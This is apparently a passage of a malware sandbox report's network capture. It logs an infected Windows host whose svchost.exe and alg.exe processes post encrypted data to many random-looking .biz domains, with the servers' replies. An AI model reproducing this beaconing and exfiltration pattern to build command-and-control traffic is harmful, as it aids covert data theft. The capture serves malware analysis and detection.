Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49979 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:01.946935892 CEST | 346 | OUT | POST /hrvg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:01.946935892 CEST | 786 | OUT | Data Raw: 2b 6a fa ce 78 f9 29 ef 06 03 00 00 44 ae d0 42 b2 28 bc 0c 0a 5e 09 cf 42 bc 8a da 56 1c 8e c2 ac c0 c0 35 e1 55 eb d5 1c fe f2 c8 95 02 d0 0a c7 9c f2 bf fa 82 a6 fb 3d e9 d0 e2 34 75 1e a9 24 14 13 40 86 72 d2 0a e8 87 66 ca b8 18 7d 55 83 d7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +jx)DB(^BV5U=4u$@rf}U$WbTf$@5&%n2$mBrlbE,YLi=_TZ!%]xYY{'zhBuVSE^`O,vsI/"H,<;UZ$
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.323447943 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=603bde0d86f7ada9dda25acf3810d075|8.46.123.33|1728394143|1728394143|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49985 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:02.534840107 CEST | 345 | OUT | POST /bc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: wllvnzb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 8, 2024 15:29:02.534946918 CEST | 778 | OUT | Data Raw: 88 20 8e 92 cc c2 9f b8 fe 02 00 00 40 a7 32 16 e9 e1 cc 04 1f 0b de c4 14 0e f1 42 8b f9 99 bf 2e 90 e9 0d 15 cf 3c 8b 26 53 39 01 cf b2 c4 ae ce f0 cd 12 2a f9 96 fc bd 92 b3 97 dc 2c fa 61 67 b0 89 b6 af 8b ba 17 71 f4 3e 87 cd 15 b5 c8 03 b7
    Data Ascii: @2B.<&S9*,agq>y;,Da4!c~*g_rcEYsQ9D*r@6XI9i4YUA?#$m#{KTYGh?6u59&K'NS[`rI3/
Oct 8, 2024 15:29:03.884291887 CEST | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 08 Oct 2024 13:29:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=71aed14bf4c180b5ea4264bcbcc44b0c|8.46.123.33|1728394143|1728394143|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49993 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:03.858597994 CEST | 356 | OUT | POST /hqdytjqsnbt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: sxmiywsfv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 786
Oct 8, 2024 15:29:03.858628988 CEST | 786 | OUT | Data Raw: c3 31 64 07 5d cc 9c 80 06 03 00 00 64 b5 4d 72 d0 e6 ad 1a 43 3e a4 73 ff ab 5f 08 a0 0d 57 19 4d 1e 48 dd 25 54 50 8f 2b 1e 1c ea 29 ea 74 01 6a fd 45 aa e3 01 c6 5c ff 2b 04 0d 5c ed 4e e5 2e d7 da 6e 83 24 2d 91 70 e1 23 6d d1 75 b4 e6 ac b3
    Data Ascii: 1d]dMrC>s_WMH%TP+)tjE\+\N.n$-p#muGz:tqTnm^6*Y5cnah{HP2.$V/a9QmMVd+m7$,BKb7%y%um#*C1:mb!G
Oct 8, 2024 15:29:05.206729889 CEST | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 08 Oct 2024 13:29:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d44c2b2ed0fbd58a4c41f68ea1b3bd7c|8.46.123.33|1728394144|1728394144|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              72192.168.2.44999818.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.381483078 CEST350OUTPOST /bssxxkwdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:04.381508112 CEST | 778 | OUT | Data Raw: 56 a8 00 80 1c e0 f7 fa fe 02 00 00 dd 7b fe d2 33 74 53 f8 91 9f 8e fb 5b 4e d2 92 fd 11 07 7d 33 69 f7 05 07 5d e3 d2 f2 51 4d de 41 ef da b6 cd eb c7 5e e6 42 59 da c4 e2 25 d1 43 62 9a 0e 8f 62 fe f2 18 ca 84 4e 04 26 bb 4b 91 ba a2 9e 80 d0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V{3tS[N}3i]QMA^BY%CbbN&KlVJOTyR55jR"jze0s;SO{&v.Jn(`9Pu9g&\)9^Eo=)8W;`A~{<-*2'K;zz4w6MD
Oct 8, 2024 15:29:04.863178015 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=71463a8800326601640a2997905a3bf4|8.46.123.33|1728394144|1728394144|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 50004 | 44.221.84.105 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:05.150259972 CEST | 345 | OUT | POST /t HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:05.150288105 CEST | 778 | OUT | Data Raw: 64 52 88 52 66 c7 f9 cf fe 02 00 00 9b 71 ce 9a 8a 74 59 f4 8b 06 d5 36 1b 46 05 82 df e8 7e 8d bb e6 7d c7 20 3e 34 cf b7 4d 82 30 8d 2e f5 4a 78 ac 2a 90 b6 5a 74 18 92 c3 61 50 4f 6d 85 fd 0e 01 f2 36 bc b3 a7 b5 32 6f 85 e0 47 37 de 08 70 8b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dRRfqtY6F~} >4M0.Jx*ZtaPOm62oG7p`6Dw:#.BU4!<,=[yOD*"u{6hnk';eNjA[>uJ^F-2TfAE({%z0lfoU$
Oct 8, 2024 15:29:05.787585020 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b0e31ba57d24e9d74f4313b9f5e7ffaa|8.46.123.33|1728394145|1728394145|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 50007 | 34.211.97.45 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:05.352960110 CEST | 356 | OUT | POST /jweaqenrkqbo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:05.352991104 CEST | 786 | OUT | Data Raw: 18 66 5f bd f6 bd bd ae 06 03 00 00 a3 26 d9 04 6b 02 a9 a2 e2 e4 e4 f3 22 7f 72 d8 2e a3 74 50 66 3f 92 2c b5 fa ed e6 73 41 56 45 8b 85 1e 9c 65 74 52 61 47 30 39 46 f5 c0 c4 53 0a 5b aa e1 83 e0 e7 7b 09 2e 56 d2 12 5e db d6 36 9f 2f 97 40 78
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: f_&k"r.tPf?,sAVEetRaG09FS[{.V^6/@x)'GcL+OPfgyJoa),c,6]I/tHPD>dV#KOP[;4F(XA)JL{!FKtiIwacnTb>Q
Oct 8, 2024 15:29:06.095817089 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4b2219addcc0f3c1360e10cd921751b6|8.46.123.33|1728394145|1728394145|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50012 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:06.142559052 CEST | 355 | OUT | POST /fehxmtmgeeq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.142577887 CEST778OUTData Raw: 71 b0 d1 82 24 4c 1d 7f fe 02 00 00 ae 07 25 96 a2 6d 18 d5 cf 28 64 f7 15 61 4a 4c 7c 65 66 3a b6 8f 33 41 02 a6 35 e0 99 81 c0 47 62 40 32 9c a1 5e 0c 4d ec 3f 5d 4a 48 eb 3a 75 28 d6 8d 20 07 64 0c 2e 09 0c d4 b1 55 cd 42 0d dc 7e 1f ef c0 bb
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: q$L%m(daJL|ef:3A5Gb@2^M?]JH:u( d.UB~-f,$ZN#ouRb&C'{\c4E&U0xNM1cZZC*7f]2*v*NZov"[.'>`y'1kw#\8z1
Oct 8, 2024 15:29:07.490571976 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=254a08ae381ed90c5996adad68dfa9f1|8.46.123.33|1728394147|1728394147|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50014 | 47.129.31.212 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:06.246133089 CEST | 343 | OUT | POST /h HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.246154070 CEST786OUTData Raw: 59 22 39 50 ea ad 1e 54 06 03 00 00 f6 34 0d 7f 9d 09 93 40 c0 fc 12 71 58 0c 2e 7e 29 89 7a e1 cf 2c 60 8f 67 4b 68 e7 2c 2a 1f a5 95 5c c2 da 70 20 82 27 90 d2 d6 0f 65 59 3d 37 f4 85 33 d1 85 dd 27 de 45 d0 1d c0 17 3c 0d 23 fd ac a3 a7 0c f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y"9PT4@qX.~)z,`gKh,*\p 'eY=73'E<#Mv/CJ(BR8bSiA%\E["H?iu[nFa%g,QYXB}SUR3qSK@VKH|&P{X9`*T]
Oct 8, 2024 15:29:07.583611965 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c56e185517ceadd6d3e19e89c2819c69|8.46.123.33|1728394147|1728394147|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50024 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:07.696990967 CEST | 346 | OUT | POST /aya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.697006941 CEST786OUTData Raw: e3 74 84 7a d9 ea 5c 89 06 03 00 00 7f 78 a5 2b ec b8 ea 3d 33 8e 64 55 f8 52 51 43 e5 7b 96 a0 62 93 12 6a 41 9e 2e 18 6b 3c d9 15 78 b0 0e 5b 41 8f 29 53 06 88 d0 58 ee 98 8b f6 bd de c0 44 65 a3 b6 36 44 39 db 47 80 4d 72 fc 48 02 1c 1b 23 05
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tz\x+=3dURQC{bjA.k<x[A)SXDe6D9GMrH#zC(Y4LVgsm$NAk0|x/kiQU#a>3?h2 `2Ki}3|z,ENn6 0@JE~H?!k#1%)
Oct 8, 2024 15:29:09.041747093 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=19b5cd6332a736ffe81d5a548e6a73e9|8.46.123.33|1728394148|1728394148|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50026 | 44.213.104.86 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:07.865319014 CEST | 346 | OUT | POST /sopra HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:07.865330935 CEST | 778 | OUT | Data Raw: 5e 8f ef e7 e5 ac bc 4d fe 02 00 00 40 f4 67 54 44 61 70 bd 82 fd 06 8b e9 37 a5 0a 19 fd 32 d3 9d 38 67 f5 83 c5 d4 8a 9d 79 9b 04 f4 44 5b 1f 72 63 69 68 66 77 3f b1 6b 93 0f f9 4a ce fb 54 a3 d3 1e 89 e1 83 57 de 65 df 08 16 bb 5e cd b9 2a 06
Data Ascii: ^M@gTDap728gyD[rcihfw?kJTWe^*W(wlG5;0_+@YXGb0'x}c8J]${Bfphgt8EGe]9L|~j$GkF/MC^k$@8&a5
Oct 8, 2024 15:29:08.350023985 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3bfc23e3bd066d61f89c0006040b17a1|8.46.123.33|1728394148|1728394148|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50032 | 18.208.156.248 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:08.657721043 CEST | 346 | OUT | POST /hb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:08.657721043 CEST | 778 | OUT | Data Raw: d1 c9 b5 a3 37 14 a4 a9 fe 02 00 00 aa 2b ad f1 41 b8 4e 42 de 82 02 8a 4f c9 9e e4 ab 2e 72 3b 89 9d 86 e6 1b 9c 4a 8c 47 ab da d7 14 79 8f 38 d6 8d 35 95 a6 cc c8 3d 60 07 05 f8 7d b4 46 48 71 92 97 4e 54 c3 60 81 1c f3 9a 68 1c e0 de 9c d4 55
Data Ascii: 7+ANBO.r;JGy85=`}FHqNT`hUDSF,H2d)Y<Yj'{JRZE2zil/(S>TKwlw,8LH-5pZ"9NXOnZV9>XKryP42MhI%A
Oct 8, 2024 15:29:09.115070105 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=380fbf0e95c15fe563896ec9eb501d0e|8.46.123.33|1728394149|1728394149|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50039 | 34.211.97.45 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:09.339202881 CEST | 345 | OUT | POST /aaxb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:09.339225054 CEST | 786 | OUT | Data Raw: a6 c0 44 30 30 56 29 d0 06 03 00 00 c6 cf d8 d4 41 ce ab 83 bf 44 a8 d0 1b fa 2d 45 85 26 d8 91 39 39 6e 5d 4b 33 bb 89 b8 5d d2 7d 08 ca cc 77 7d 4c 6a fd 97 f5 fb f9 ed 33 f2 0f 5d 5d e6 31 14 c8 11 77 92 6b 7e 0d f4 a4 8b 9c 98 78 d2 90 c3 21
Data Ascii: D00V)AD-E&99n]K3]}w}Lj3]]1wk~x!vXb"u]7xy`^a<mSw_DaZ1{O;xEjw K/o'eArX4}/ '"o>H,Bvdq*B*97
Oct 8, 2024 15:29:10.093199015 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a8b9ed834ecfce04844d95e3e99b68d8|8.46.123.33|1728394149|1728394149|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
